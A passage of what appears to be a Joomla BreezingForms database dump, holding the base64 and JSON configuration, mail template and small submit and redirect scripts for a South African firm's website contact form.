sc2UsImZvcmNlTW9iaWxlVXJsIjoiaW5kZXgucGhwIiwidGl0bGVfdHJhbnNsYXRpb24iOiIiLCJ0aGVtZWJvb3RzdHJhcE1vZGUiOmZhbHNlLCJzdWJtaXRMYWJlbF90cmFuc2xhdGlvbiI6IiIsImNhbmNlbExhYmVsX3RyYW5zbGF0aW9uIjoiIiwicGFnaW5nTmV4dExhYmVsX3RyYW5zbGF0aW9uIjoiIiwicGFnaW5nUHJldkxhYmVsX3RyYW5zbGF0aW9uIjoiIiwidGhlbWVib290c3RyYXB2YXJzIjoiIn0sInN0YXRlIjoib3BlbiIsImRhdGEiOnsidGl0bGUiOiJDb250YWN0IiwiaWNvbiI6Ii4uXC9hZG1pbmlzdHJhdG9yXC9jb21wb25lbnRzXC9jb21fYnJlZXppbmdmb3Jtc1wvbGlicmFyaWVzXC9qcXVlcnlcL3RoZW1lc1wvcXVpY2ttb2RlXC9pXC9pY29uX2Zvcm0ucG5nIn0sImNoaWxkcmVuIjpbeyJhdHRyaWJ1dGVzIjp7ImNsYXNzIjoiYmZRdWlja01vZGVQYWdlQ2xhc3MiLCJpZCI6ImJmUXVpY2tNb2RlUGFnZTEiLCJtZGF0YSI6IntcImRlbGV0YWJsZVwiOiB0cnVlLCBcInR5cGVcIjogXCJwYWdlXCJ9In0sInByb3BlcnRpZXMiOnsidHlwZSI6InBhZ2UiLCJwYWdlTnVtYmVyIjoxLCJwYWdlSW50cm8iOiIifSwic3RhdGUiOiJvcGVuIiwiZGF0YSI6eyJ0aXRsZSI6IlBhZ2UgMSIsImljb24iOiIuLlwvYWRtaW5pc3RyYXRvclwvY29tcG9uZW50c1wvY29tX2JyZWV6aW5nZm9ybXNcL2xpYnJhcmllc1wvanF1ZXJ5XC90aGVtZXNcL3F1aWNrbW9kZVwvaVwvaWNvbl9wYWdlLnBuZyJ9LCJjaGlsZHJlbiI6W3siYXR0cmlidXRlcyI6eyJjbGFzcyI6ImJmUXVpY2tNb2RlRWxlbWVudENsYXNzIiwiaWQiOiJOQU1FIiwibWRhdGEiOiJ7XCJkZWxldGFibGVcIjogdHJ1ZSwgXCJ0eXBlXCI6IFwiZWxlbWVudFwifSJ9LCJkYXRhIjp7InRpdGxlIjoiTmFtZSIsImljb24iOiIuLlwvYWRtaW5pc3RyYXRvclwvY29tcG9uZW50c1wvY29tX2JyZWV6aW5nZm9ybXNcL2xpYnJhcmllc1wvanF1ZXJ5XC90aGVtZXNcL3F1aWNrbW9kZVwvaVwvaWNvbl90ZXh0LWZpZWxkLnBuZyJ9LCJwcm9wZXJ0aWVzIjp7InR5cGUiOiJlbGVtZW50IiwiYmZUeXBlIjoiYmZUZXh0ZmllbGQiLCJsYWJlbCI6Ik5hbWUiLCJsYWJlbFBvc2l0aW9uIjoibGVmdCIsImJmTmFtZSI6Ik5BTUUiLCJkYklkIjo1LCJvcmRlck51bWJlciI6Ii0xIiwidGFiSW5kZXgiOiItMSIsImxvZ2dpbmciOnRydWUsImhpZGVMYWJlbCI6dHJ1ZSwicmVxdWlyZWQiOnRydWUsImhpbnQiOiIiLCJvZmYiOmZhbHNlLCJwbGFjZWhvbGRlciI6Ik5hbWUiLCJ2YWx1ZSI6IiIsIm1heExlbmd0aCI6IiIsInJlYWRvbmx5IjpmYWxzZSwicGFzc3dvcmQiOmZhbHNlLCJtYWlsYmFjayI6ZmFsc2UsIm1haWxiYWNrQXNTZW5kZXIiOmZhbHNlLCJtYWlsYmFja2ZpbGUiOiIiLCJzaXplIjoiMTAwJSIsInZhbGlkYXRpb25Db25kaXRpb24iOjEsInZhbGlkYXRpb25JZCI6IjQ0IiwidmFsaWRhdGlvbkNvZGUiOiIiLCJ2YWxpZGF0aW9uTWVzc2FnZSI6IlBsZWFzZSBmaWxsIGluIHlvdXIgbmFtZS4iLCJ2YWxpZGF0aW9uRnVuY3Rpb25OYW1lIjoiZmZfdmFsdWVub3RlbXB0eSIsImluaXRDb25kaXRpb24iOjAsImluaXRJZCI6IjgiLCJpbml0Q29kZSI6IiIsImluaXRGdW5jdGlvbk5hbWUiOiIiLCJpbml0Rm9ybUVudHJ5IjowLCJpbml0UGFnZUVudHJ5IjowLCJhY3Rpb25Db25kaXRpb24iOjAsImFjdGlvbklkIjoiMTYiLCJhY3Rpb25Db2RlIjoiIiwiYWN0aW9uRnVuY3Rpb25OYW1lIjoiIiwiYWN0aW9uQ2xpY2siOjAsImFjdGlvbkJsdXIiOjAsImFjdGlvbkNoYW5nZSI6MCwiYWN0aW9uRm9jdXMiOjAsImFjdGlvblNlbGVjdCI6MCwiaGlkZUluTWFpbGJhY2siOmZhbHNlLCJ2YWx1ZV90cmFuc2xhdGlvbiI6IiIsInBsYWNlaG9sZGVyX3RyYW5zbGF0aW9uIjoiIiwibGFiZWxfdHJhbnNsYXRpb24iOiIiLCJoaW50X3RyYW5zbGF0aW9uIjoiIiwidmFsaWRhdGlvbk1lc3NhZ2VfdHJhbnNsYXRpb24iOiIifX0seyJhdHRyaWJ1dGVzIjp7ImNsYXNzIjoiYmZRdWlja01vZGVFbGVtZW50Q2xhc3MiLCJpZCI6IkVNQUlMIiwibWRhdGEiOiJ7XCJkZWxldGFibGVcIjogdHJ1ZSwgXCJ0eXBlXCI6IFwiZWxlbWVudFwifSJ9LCJkYXRhIjp7InRpdGxlIjoiRW1haWwiLCJpY29uIjoiLi5cL2FkbWluaXN0cmF0b3JcL2NvbXBvbmVudHNcL2NvbV9icmVlemluZ2Zvcm1zXC9saWJyYXJpZXNcL2pxdWVyeVwvdGhlbWVzXC9xdWlja21vZGVcL2lcL2ljb25fdGV4dC1maWVsZC5wbmcifSwicHJvcGVydGllcyI6eyJ0eXBlIjoiZWxlbWVudCIsImJmVHlwZSI6ImJmVGV4dGZpZWxkIiwibGFiZWwiOiJFbWFpbCIsImxhYmVsUG9zaXRpb24iOiJsZWZ0IiwiYmZOYW1lIjoiRU1BSUwiLCJkYklkIjoyOCwib3JkZXJOdW1iZXIiOiItMSIsInRhYkluZGV4IjoiLTEiLCJsb2dnaW5nIjp0cnVlLCJoaWRlTGFiZWwiOnRydWUsInJlcXVpcmVkIjpmYWxzZSwiaGludCI6IiIsIm9mZiI6ZmFsc2UsInBsYWNlaG9sZGVyIjoiRW1haWwiLCJ2YWx1ZSI6IiIsIm1heExlbmd0aCI6IiIsInJlYWRvbmx5IjpmYWxzZSwicGFzc3dvcmQiOmZhbHNlLCJtYWlsYmFjayI6dHJ1ZSwibWFpbGJhY2tBc1NlbmRlciI6dHJ1ZSwibWFpbGJhY2tmaWxlIjoiIiwic2l6ZSI6IjEwMCUiLCJ2YWxpZGF0aW9uQ29uZGl0aW9uIjoxLCJ2YWxpZGF0aW9uSWQiOiI0MiIsInZhbGlkYXRpb25Db2RlIjoiIiwidmFsaWRhdGlvbk1lc3NhZ2UiOiJQbGVhc2UgcHJvdmlkZSB1cyB3aXRoIHlvdXIgZW1haWwgYWRkcmVzcy4iLCJ2YWxpZGF0aW9uRnVuY3Rpb25OYW1lIjoiZmZfdmFsaWRlbWFpbCIsImluaXRDb25kaXRpb24iOjAsImluaXRJZCI6IjgiLCJpbml0Q29kZSI6IiIsImluaXRGdW5jdGlvbk5hbWUiOiIiLCJpbml0Rm9ybUVudHJ5IjowLCJpbml0UGFnZUVudHJ5IjowLCJhY3Rpb25Db25kaXRpb24iOjAsImFjdGlvbklkIjoiMTYiLCJhY3Rpb25Db2RlIjoiIiwiYWN0aW9uRnVuY3Rpb25OYW1lIjoiIiwiYWN0aW9uQ2xpY2siOjAsImFjdGlvbkJsdXIiOjAsImFjdGlvbkNoYW5nZSI6MCwiYWN0aW9uRm9jdXMiOjAsImFjdGlvblNlbGVjdCI6MCwiaGlkZUluTWFpbGJhY2siOmZhbHNlLCJ2YWx1ZV90cmFuc2xhdGlvbiI6IiIsInBsYWNlaG9sZGVyX3RyYW5zbGF0aW9uIjoiIiwibGFiZWxfdHJhbnNsYXRpb24iOiIiLCJoaW50X3RyYW5zbGF0aW9uIjoiIiwidmFsaWRhdGlvbk1lc3NhZ2VfdHJhbnNsYXRpb24iOiIifX0seyJhdHRyaWJ1dGVzIjp7ImNsYXNzIjoiYmZRdWlja01vZGVFbGVtZW50Q2xhc3MiLCJpZCI6IkRFUEFSVE1FTlQiLCJtZGF0YSI6IntcImRlbGV0YWJsZVwiOiB0cnVlLCBcInR5cGVcIjogXCJlbGVtZW50XCJ9In0sImRhdGEiOnsidGl0bGUiOiJEZXBhcnRtZW50IiwiaWNvbiI6Ii4uXC9hZG1pbmlzdHJhdG9yXC9jb21wb25lbnRzXC9jb21fYnJlZXppbmdmb3Jtc1wvbGlicmFyaWVzXC9qcXVlcnlcL3RoZW1lc1wvcXVpY2ttb2RlXC9pXC9pY29uX3NlbGVjdC5wbmcifSwicHJvcGVydGllcyI6eyJ0eXBlIjoiZWxlbWVudCIsImJmVHlwZSI6ImJmU2VsZWN0IiwibGFiZWwiOiJEZXBhcnRtZW50IiwibGFiZWxQb3NpdGlvbiI6ImxlZnQiLCJiZk5hbWUiOiJERVBBUlRNRU5UIiwiZGJJZCI6Niwib3JkZXJOdW1iZXIiOiItMSIsInRhYkluZGV4IjoiLTEiLCJsb2dnaW5nIjp0cnVlLCJoaWRlTGFiZWwiOnRydWUsInJlcXVpcmVkIjpmYWxzZSwiaGludCI6IiIsIm9mZiI6ZmFsc2UsImxpc3QiOiIwO1BsZWFzZSBzZWxlY3QgYSBkZXBhcnRtZW50O1xuMDtHZW5lcmFsIEVucXVpcnk7c2hpcmxleUBzbWl0aGFuZHNtaXRoLmNvLnphXG4wO0FwcG9pbnRtZW50cztzaGlybGV5QHNtaXRoYW5kc21pdGguY28uemFcbjA7U2hvcnQgdGVybSBJbnN1cmFuY2U7c2hpcmxleUBzbWl0aGFuZHNtaXRoLmNvLnphXG4wO0hlYWx0aGNhcmU7c2hpcmxleUBzbWl0aGFuZHNtaXRoLmNvLnphXG4wO0ZpbmFuY2lhbCBQbGFubmluZztzaGlybGV5QHNtaXRoYW5kc21pdGguY28uemFcbjA7T3RoZXI7YmV2YW5Ad2Vic3ByaW5nLmNvLnphIiwicmVhZG9ubHkiOmZhbHNlLCJtdWx0aXBsZSI6ZmFsc2UsIm1haWxiYWNrIjp0cnVlLCJ3aWR0aCI6IjEwMCUiLCJoZWlnaHQiOiIiLCJ2YWxpZGF0aW9uQ29uZGl0aW9uIjoxLCJ2YWxpZGF0aW9uSWQiOiI0NCIsInZhbGlkYXRpb25Db2RlIjoiIiwidmFsaWRhdGlvbk1lc3NhZ2UiOiJQbGVhc2Ugc2VsZWN0IGEgZGVwYXJ0bWVudCBmcm9tIHRoZSBkcm9wZG93biBsaXN0LiIsInZhbGlkYXRpb25GdW5jdGlvbk5hbWUiOiJmZl92YWx1ZW5vdGVtcHR5IiwiaW5pdENvbmRpdGlvbiI6MCwiaW5pdElkIjoiOCIsImluaXRDb2RlIjoiIiwiaW5pdEZ1bmN0aW9uTmFtZSI6IiIsImluaXRGb3JtRW50cnkiOjAsImluaXRQYWdlRW50cnkiOjAsImFjdGlvbkNvbmRpdGlvbiI6MCwiYWN0aW9uSWQiOiIxNiIsImFjdGlvbkNvZGUiOiIiLCJhY3Rpb25GdW5jdGlvbk5hbWUiOiIiLCJhY3Rpb25DbGljayI6MCwiYWN0aW9uQmx1ciI6MCwiYWN0aW9uQ2hhbmdlIjowLCJhY3Rpb25Gb2N1cyI6MCwiYWN0aW9uU2VsZWN0IjowLCJoaWRlSW5NYWlsYmFjayI6ZmFsc2UsImxpc3RfdHJhbnNsYXRpb24iOiIiLCJoaW50X3RyYW5zbGF0aW9uIjoiIiwibGFiZWxfdHJhbnNsYXRpb24iOiIiLCJ2YWxpZGF0aW9uTWVzc2FnZV90cmFuc2xhdGlvbiI6IiJ9fSx7ImF0dHJpYnV0ZXMiOnsiY2xhc3MiOiJiZlF1aWNrTW9kZUVsZW1lbnRDbGFzcyIsImlkIjoiTUVTU0FHRSIsIm1kYXRhIjoie1wiZGVsZXRhYmxlXCI6IHRydWUsIFwidHlwZVwiOiBcImVsZW1lbnRcIn0ifSwiZGF0YSI6eyJ0aXRsZSI6Ik1lc3NhZ2UiLCJpY29uIjoiLi5cL2FkbWluaXN0cmF0b3JcL2NvbXBvbmVudHNcL2NvbV9icmVlemluZ2Zvcm1zXC9saWJyYXJpZXNcL2pxdWVyeVwvdGhlbWVzXC9xdWlja21vZGVcL2lcL2ljb25fdGV4dC1hcmVhLnBuZyJ9LCJwcm9wZXJ0aWVzIjp7InR5cGUiOiJlbGVtZW50IiwiYmZUeXBlIjoiYmZUZXh0YXJlYSIsImxhYmVsIjoiTWVzc2FnZSIsImxhYmVsUG9zaXRpb24iOiJsZWZ0IiwiYmZOYW1lIjoiTUVTU0FHRSIsImRiSWQiOjMzLCJvcmRlck51bWJlciI6Ii0xIiwidGFiSW5kZXgiOiItMSIsImxvZ2dpbmciOnRydWUsImhpZGVMYWJlbCI6dHJ1ZSwicmVxdWlyZWQiOmZhbHNlLCJoaW50IjoiIiwib2ZmIjpmYWxzZSwicGxhY2Vob2xkZXIiOiJUeXBlIHlvdSBtZXNzYWdlIGhlcmUuLi4iLCJpc19odG1sIjpmYWxzZSwidmFsdWUiOiIiLCJ3aWR0aCI6IjEwMCUiLCJoZWlnaHQiOiIxMDBweCIsIm1heGxlbmd0aCI6IjAiLCJzaG93TWF4bGVuZ3RoQ291bnRlciI6dHJ1ZSwicmVhZG9ubHkiOmZhbHNlLCJ2YWxpZGF0aW9uQ29uZGl0aW9uIjowLCJ2YWxpZGF0aW9uSWQiOiIxIiwidmFsaWRhdGlvbkNvZGUiOiIiLCJ2YWxpZGF0aW9uTWVzc2FnZSI6IiIsInZhbGlkYXRpb25GdW5jdGlvbk5hbWUiOiIiLCJpbml0Q29uZGl0aW9uIjowLCJpbml0SWQiOiI4IiwiaW5pdENvZGUiOiIiLCJpbml0RnVuY3Rpb25OYW1lIjoiIiwiaW5pdEZvcm1FbnRyeSI6MCwiaW5pdFBhZ2VFbnRyeSI6MCwiYWN0aW9uQ29uZGl0aW9uIjowLCJhY3Rpb25JZCI6IjE2IiwiYWN0aW9uQ29kZSI6IiIsImFjdGlvbkZ1bmN0aW9uTmFtZSI6IiIsImFjdGlvbkNsaWNrIjowLCJhY3Rpb25CbHVyIjowLCJhY3Rpb25DaGFuZ2UiOjAsImFjdGlvbkZvY3VzIjowLCJhY3Rpb25TZWxlY3QiOjAsImhpZGVJbk1haWxiYWNrIjpmYWxzZSwidmFsdWVfdHJhbnNsYXRpb24iOiIiLCJwbGFjZWhvbGRlcl90cmFuc2xhdGlvbiI6IiIsImxhYmVsX3RyYW5zbGF0aW9uIjoiIiwiaGludF90cmFuc2xhdGlvbiI6IiIsInZhbGlkYXRpb25NZXNzYWdlX3RyYW5zbGF0aW9uIjoiIn19XX0seyJhdHRyaWJ1dGVzIjp7ImNsYXNzIjoiYmZRdWlja01vZGVQYWdlQ2xhc3MiLCJpZCI6ImJmUXVpY2tNb2RlUGFnZTIiLCJtZGF0YSI6IntcImRlbGV0YWJsZVwiOiB0cnVlLCBcInR5cGVcIjogXCJwYWdlXCJ9In0sInByb3BlcnRpZXMiOnsidHlwZSI6InBhZ2UiLCJwYWdlTnVtYmVyIjoyLCJwYWdlSW50cm8iOiI8cCBzdHlsZT1cInRleHQtYWxpZ246IGNlbnRlcjtcIj48ZW0+PHN0cm9uZz5UaGFuayB5b3UgZm9yIGNvbnRhY3RpbmcgdXMuIFdlIHdpbGwgcmVwbHkgdG8geW91IHNob3J0bHkuPFwvc3Ryb25nPjxcL2VtPjxcL3A+In0sInN0YXRlIjoib3BlbiIsImRhdGEiOnsidGl0bGUiOiJQYWdlIDIiLCJpY29uIjoiLi5cL2FkbWluaXN0cmF0b3JcL2NvbXBvbmVudHNcL2NvbV9icmVlemluZ2Zvcm1zXC9saWJyYXJpZXNcL2pxdWVyeVwvdGhlbWVzXC9xdWlja21vZGVcL2lcL2ljb25fcGFnZS5wbmcifSwiY2hpbGRyZW4iOltdfV19','QuickMode','[{\"elements\":[{\"element\":null,\"bfType\":\"Text\",\"elementType\":\"\",\"options\":{\"value\":\"\",\"placeholder\":\"Name\",\"password\":false,\"mailback\":false,\"readonly\":false},\"data1\":\"\",\"data2\":\"\",\"data3\":\"\",\"script1cond\":0,\"script1id\":\"8\",\"script1code\":\"\",\"script1flag1\":0,\"script1flag2\":0,\"script2cond\":0,\"script2id\":\"16\",\"script2code\":\"\",\"script2flag1\":0,\"script2flag2\":0,\"script2flag3\":0,\"script2flag4\":0,\"script2flag5\":0,\"script3cond\":1,\"script3id\":\"44\",\"script3code\":\"\",\"script3msg\":\"Please fill in your name.\",\"functionNameScript1\":\"\",\"functionNameScript2\":\"\",\"functionNameScript3\":\"ff_valuenotempty\",\"flag1\":0,\"flag2\":0,\"mailback\":0,\"mailbackfile\":\"\",\"title\":\"Name\",\"name\":\"NAME\",\"page\":\"1\",\"orderNumber\":1,\"dbId\":5,\"appElementOrderId\":0,\"id\":0,\"logging\":true,\"qId\":\"NAME\",\"internalType\":\"bfTextfield\",\"mailbackAsSender\":0,\"tabIndex\":\"-1\",\"hideInMailback\":false},{\"element\":null,\"bfType\":\"Text\",\"elementType\":\"\",\"options\":{\"value\":\"\",\"placeholder\":\"Email\",\"password\":false,\"mailback\":true,\"readonly\":false},\"data1\":\"\",\"data2\":\"\",\"data3\":\"\",\"script1cond\":0,\"script1id\":\"8\",\"script1code\":\"\",\"script1flag1\":0,\"script1flag2\":0,\"script2cond\":0,\"script2id\":\"16\",\"script2code\":\"\",\"script2flag1\":0,\"script2flag2\":0,\"script2flag3\":0,\"script2flag4\":0,\"script2flag5\":0,\"script3cond\":1,\"script3id\":\"42\",\"script3code\":\"\",\"script3msg\":\"Please provide us with your email address.\",\"functionNameScript1\":\"\",\"functionNameScript2\":\"\",\"functionNameScript3\":\"ff_validemail\",\"flag1\":0,\"flag2\":0,\"mailback\":1,\"mailbackfile\":\"\",\"title\":\"Email\",\"name\":\"EMAIL\",\"page\":\"1\",\"orderNumber\":2,\"dbId\":28,\"appElementOrderId\":0,\"id\":0,\"logging\":true,\"qId\":\"EMAIL\",\"internalType\":\"bfTextfield\",\"mailbackAsSender\":1,\"tabIndex\":\"-1\",\"hideInMailback\":false},{\"element\":null,\"bfType\":\"Select List\",\"elementType\":\"\",\"options\":{\"multiple\":false,\"options\":\"0;Please select a department;\\n0;General Enquiry;shirley@smithandsmith.co.za\\n0;Appointments;shirley@smithandsmith.co.za\\n0;Short term Insurance;shirley@smithandsmith.co.za\\n0;Healthcare;shirley@smithandsmith.co.za\\n0;Financial Planning;shirley@smithandsmith.co.za\\n0;Other;bevan@webspring.co.za\",\"mailback\":true,\"readonly\":false},\"data1\":1,\"data2\":\"0;Please select a department;\\n0;General Enquiry;shirley@smithandsmith.co.za\\n0;Appointments;shirley@smithandsmith.co.za\\n0;Short term Insurance;shirley@smithandsmith.co.za\\n0;Healthcare;shirley@smithandsmith.co.za\\n0;Financial Planning;shirley@smithandsmith.co.za\\n0;Other;bevan@webspring.co.za\",\"data3\":\"\",\"script1cond\":0,\"script1id\":\"8\",\"script1code\":\"\",\"script1flag1\":0,\"script1flag2\":0,\"script2cond\":0,\"script2id\":\"16\",\"script2code\":\"\",\"script2flag1\":0,\"script2flag2\":0,\"script2flag3\":0,\"script2flag4\":0,\"script2flag5\":0,\"script3cond\":1,\"script3id\":\"44\",\"script3code\":\"\",\"script3msg\":\"Please select a department from the dropdown list.\",\"functionNameScript1\":\"\",\"functionNameScript2\":\"\",\"functionNameScript3\":\"ff_valuenotempty\",\"flag1\":0,\"flag2\":0,\"mailback\":1,\"mailbackfile\":\"\",\"title\":\"Department\",\"name\":\"DEPARTMENT\",\"page\":\"1\",\"orderNumber\":3,\"dbId\":6,\"appElementOrderId\":0,\"id\":0,\"logging\":true,\"qId\":\"DEPARTMENT\",\"internalType\":\"bfSelect\",\"tabIndex\":\"-1\",\"hideInMailback\":false},{\"element\":null,\"bfType\":\"Textarea\",\"elementType\":\"\",\"options\":{\"value\":\"\",\"placeholder\":\"Type you message here...\",\"readonly\":false},\"data1\":\"\",\"data2\":\"\",\"data3\":\"\",\"script1cond\":0,\"script1id\":\"8\",\"script1code\":\"\",\"script1flag1\":0,\"script1flag2\":0,\"script2cond\":0,\"script2id\":\"16\",\"script2code\":\"\",\"script2flag1\":0,\"script2flag2\":0,\"script2flag3\":0,\"script2flag4\":0,\"script2flag5\":0,\"script3cond\":0,\"script3id\":\"1\",\"script3code\":\"\",\"script3msg\":\"\",\"functionNameScript1\":\"\",\"functionNameScript2\":\"\",\"functionNameScript3\":\"\",\"flag1\":0,\"flag2\":0,\"mailback\":0,\"mailbackfile\":\"\",\"title\":\"Message\",\"name\":\"MESSAGE\",\"page\":\"1\",\"orderNumber\":4,\"dbId\":33,\"appElementOrderId\":0,\"id\":0,\"logging\":true,\"qId\":\"MESSAGE\",\"internalType\":\"bfTextarea\",\"tabIndex\":\"-1\",\"hideInMailback\":false},{\"element\":null,\"bfType\":\"\",\"elementType\":\"\",\"options\":[],\"data1\":\"\",\"data2\":\"\",\"data3\":\"\",\"script1cond\":0,\"script1id\":0,\"script1code\":\"\",\"script1flag1\":0,\"script1flag2\":0,\"script2cond\":1,\"script2id\":\"41\",\"script2code\":\"\",\"script2flag1\":0,\"script2flag2\":0,\"script2flag3\":0,\"script2flag4\":0,\"script2flag5\":0,\"script3cond\":0,\"script3id\":0,\"script3code\":\"\",\"script3msg\":\"\",\"functionNameScript1\":\"\",\"functionNameScript2\":\"\",\"functionNameScript3\":\"\",\"flag1\":0,\"flag2\":0,\"mailback\":0,\"mailbackfile\":\"\",\"title\":\"bfFakeTitle\",\"name\":\"bfFakeName\",\"page\":1,\"orderNumber\":0,\"dbId\":50,\"appElementOrderId\":0,\"id\":0,\"logging\":0,\"qId\":0,\"internalType\":\"\"},{\"element\":null,\"bfType\":\"\",\"elementType\":\"\",\"options\":[],\"data1\":\"\",\"data2\":\"\",\"data3\":\"\",\"script1cond\":0,\"script1id\":0,\"script1code\":\"\",\"script1flag1\":0,\"script1flag2\":0,\"script2cond\":1,\"script2id\":\"23\",\"script2code\":\"\",\"script2flag1\":0,\"script2flag2\":0,\"script2flag3\":0,\"script2flag4\":0,\"script2flag5\":0,\"script3cond\":0,\"script3id\":0,\"script3code\":\"\",\"script3msg\":\"\",\"functionNameScript1\":\"\",\"functionNameScript2\":\"\",\"functionNameScript3\":\"\",\"flag1\":0,\"flag2\":0,\"mailback\":0,\"mailbackfile\":\"\",\"title\":\"bfFakeTitle2\",\"name\":\"bfFakeName2\",\"page\":1,\"orderNumber\":0,\"dbId\":51,\"appElementOrderId\":0,\"id\":0,\"logging\":0,\"qId\":0,\"internalType\":\"\"},{\"element\":null,\"bfType\":\"\",\"elementType\":\"\",\"options\":[],\"data1\":\"\",\"data2\":\"\",\"data3\":\"\",\"script1cond\":0,\"script1id\":0,\"script1code\":\"\",\"script1flag1\":0,\"script1flag2\":0,\"script2cond\":1,\"script2id\":\"40\",\"script2code\":\"\",\"script2flag1\":0,\"script2flag2\":0,\"script2flag3\":0,\"script2flag4\":0,\"script2flag5\":0,\"script3cond\":0,\"script3id\":0,\"script3code\":\"\",\"script3msg\":\"\",\"functionNameScript1\":\"\",\"functionNameScript2\":\"\",\"functionNameScript3\":\"\",\"flag1\":0,\"flag2\":0,\"mailback\":0,\"mailbackfile\":\"\",\"title\":\"bfFakeTitle3\",\"name\":\"bfFakeName3\",\"page\":1,\"orderNumber\":0,\"dbId\":52,\"appElementOrderId\":0,\"id\":0,\"logging\":0,\"qId\":0,\"internalType\":\"\"},{\"element\":null,\"bfType\":\"\",\"elementType\":\"\",\"options\":[],\"data1\":\"\",\"data2\":\"\",\"data3\":\"\",\"script1cond\":0,\"script1id\":0,\"script1code\":\"\",\"script1flag1\":0,\"script1flag2\":0,\"script2cond\":1,\"script2id\":\"38\",\"script2code\":\"\",\"script2flag1\":0,\"script2flag2\":0,\"script2flag3\":0,\"script2flag4\":0,\"script2flag5\":0,\"script3cond\":0,\"script3id\":0,\"script3code\":\"\",\"script3msg\":\"\",\"functionNameScript1\":\"\",\"functionNameScript2\":\"\",\"functionNameScript3\":\"\",\"flag1\":0,\"flag2\":0,\"mailback\":0,\"mailbackfile\":\"\",\"title\":\"bfFakeTitle4\",\"name\":\"bfFakeName4\",\"page\":1,\"orderNumber\":0,\"dbId\":53,\"appElementOrderId\":0,\"id\":0,\"logging\":0,\"qId\":0,\"internalType\":\"\"}],\"elementCount\":4}]',2,1,0,'Contact','Smith & Smith Enquiry','','Contact','','','',400,0,500,0,2,0,1,1,1,0,0,1,0,'<p>Hello, The following enquiry was received from your website. {NAME:label} : {NAME:value} {EMAIL:label} : {EMAIL:value} {DEPARTMENT:label} : {DEPARTMENT:value} {MESSAGE:value} Regards {NAME:value}</p>','',1,1,'',1,0,31,'',2,32,'function ff_Contact_submitted(status, message){if(status==0){ff_switchpage(2);}else{alert(message);}}',0,1,'',0,NULL,'',0,5,'',2,NULL,'JFactory::getApplication()->redirect(\'http://smithandsmith.co.za/component/sppagebuilder/?view=page&id=12\');',2,NULL,'',0,'',NULL),(2,'','','','','','','','',1,'','',0,0,0,0,'text',0,1,1,'','','','','',NULL,0,'','','',0,'pdf','','',0,'',1,1,1,'*',0,'0000-00-00 00:00:00','0000-00-00 00:00:00',0,'QuickModeForms','eyJhdHRyaWJ1dGVzIjp7ImNsYXNzIjoiYmZRdWlja01vZGVSb290Q2xhc3MiLCJpZCI6ImJmUXVpY2tNb2RlUm9vdCIsIm1kYXRhIjoie1widHlwZVwiOiBcInJvb3RcIn0ifSwicHJvcGVydGllcyI6eyJ0eXBlIjoicm9vdCIsInRpdGxlIjoiQ29udGFjdG5ldyIsIm5hbWUiOiJDb250YWN0bmV3Iiwicm9sbG92ZXIiOnRydWUsInJvbGxvdmVyQ29sb3IiOiIjZmZjIiwidG9nZ2xlRmllbGRzIjoiIiwiZGVzY3JpcHRpb24iOiIiLCJtYWlsTm90aWZpY2F0aW9uIjoiMSIsIm1haWxSZWNpcGllbnQiOiJzaGlybGV5QHNtaXRoYW5kc21pdGguY28uemE7YmV2YW5Ad2Vic3ByaW5nLmNvLnphIiwic3VibWl0SW5jbHVkZSI6dHJ1ZSwic3VibWl0TGFiZWwiOiJzdWJtaXQiLCJjYW5jZWxJbmNsdWRlIjpmYWxzZSwiY2FuY2VsTGFiZWwiOiJyZXNldCIsInBhZ2luZ0luY2x1ZGUiOnRydWUsInBhZ2luZ05leHRMYWJlbCI6Im5leHQiLCJwYWdpbmdQcmV2TGFiZWwiOiJiYWNrIiwidGhlbWUiOiJkZWZhdWx0IiwidGhlbWVib290c3RyYXAiOiIiLCJ0aGVtZWJvb3RzdHJhcGJlZm9yZSI6IiIsInRoZW1lYm9vdHN0cmFwTGFiZWxUb3AiOmZhbHNlLCJ0aGVtZWJvb3RzdHJhcFRoZW1lRW5naW5lIjoiYm9vdHN0cmFwIiwidGhlbWVib290c3RyYXBVc2VIZXJvVW5pdCI6ZmFsc2UsInRoZW1lYm9vdHN0cmFwVXNlV2VsbCI6ZmFsc2UsInRoZW1lYm9vdHN0cmFwVXNlUHJvZ3Jlc3MiOmZhbHNlLCJ0aGVtZXVzZWJvb3RzdHJhcGxlZ2FjeSI6ZmFsc2UsImZhZGVJbiI6ZmFsc2UsImxhc3RQYWdlVGhhbmtZb3UiOnRydWUsInN1Ym1pdHRlZFNjcmlwdENvbmRpZHRpb24iOjIsInN1Ym1pdHRlZFNjcmlwdENvZGUiOiJmdW5jdGlvbiBmZl9Db250YWN0bmV3X3N1Ym1pdHRlZChzdGF0dXMsIG1lc3NhZ2Upe2lmKHN0YXR1cz09MCl7ZmZfc3dpdGNocGFnZSgyKTt9ZWxzZXthbGVydChtZXNzYWdlKTt9fSIsInVzZUVycm9yQWxlcnRzIjpmYWxzZSwidXNlRGVmYXVsdEVycm9ycyI6dHJ1ZSwidXNlQmFsbG9vbkVycm9ycyI6ZmFsc2UsImRpc2FibGVKUXVlcnkiOmZhbHNlLCJqb29tbGFIaW50IjpmYWxzZSwibW9iaWxlRW5hYmxlZCI6ZmFsc2UsImZvcmNlTW9iaWxlIjpmYWxzZSwiZm9yY2VNb2JpbGVVcmwiOiJpbmRleC5waHAiLCJ0aXRsZV90cmFuc2xhdGlvbiI6IiIsInRoZW1lYm9vdHN0cmFwTW9kZSI6ZmFsc2UsInN1Ym1pdExhYmVsX3RyYW5zbGF0aW9uIjoiIiwiY2FuY2VsTGFiZWxfdHJhbnNsYXRpb24iOiIiLCJwYWdpbmdOZXh0TGFiZWxfdHJhbnNsYXRpb24iOiIiLCJwYWdpbmdQcmV2TGFiZWxfdHJhbnNsYXRpb24iOiIiLCJ0aGVtZWJvb3RzdHJhcHZhcnMiOiIifSwic3RhdGUiOiJvcGVuIiwiZGF0YSI6eyJ0aXRsZSI6IkNvbnRhY3RuZXciLCJpY29uIjoiLi5cL2FkbWluaXN0cmF0b3JcL2NvbXBvbmVudHNcL2NvbV9icmVlemluZ2Zvcm1zXC9saWJyYXJpZXNcL2pxdWVyeVwvdGhlbWVzXC9xdWlja21vZGVcL2lcL2ljb25fZm9ybS5wbmcifSwiY2hpbGRyZW4iOlt7ImF0dHJpYnV0ZXMiOnsiY2xhc3MiOiJiZlF1aWNrTW9kZVBhZ2VDbGFzcyIsImlkIjoiYmZRdWlja01vZGVQYWdlMSIsIm1kYXRhIjoie1wiZGVsZXRhYmxlXCI6IHRydWUsIFwidHlwZVwiOiBcInBhZ2VcIn0ifSwicHJvcGVydGllcyI6eyJ0eXBlIjoicGFnZSIsInBhZ2VOdW1iZXIiOjEsInBhZ2VJ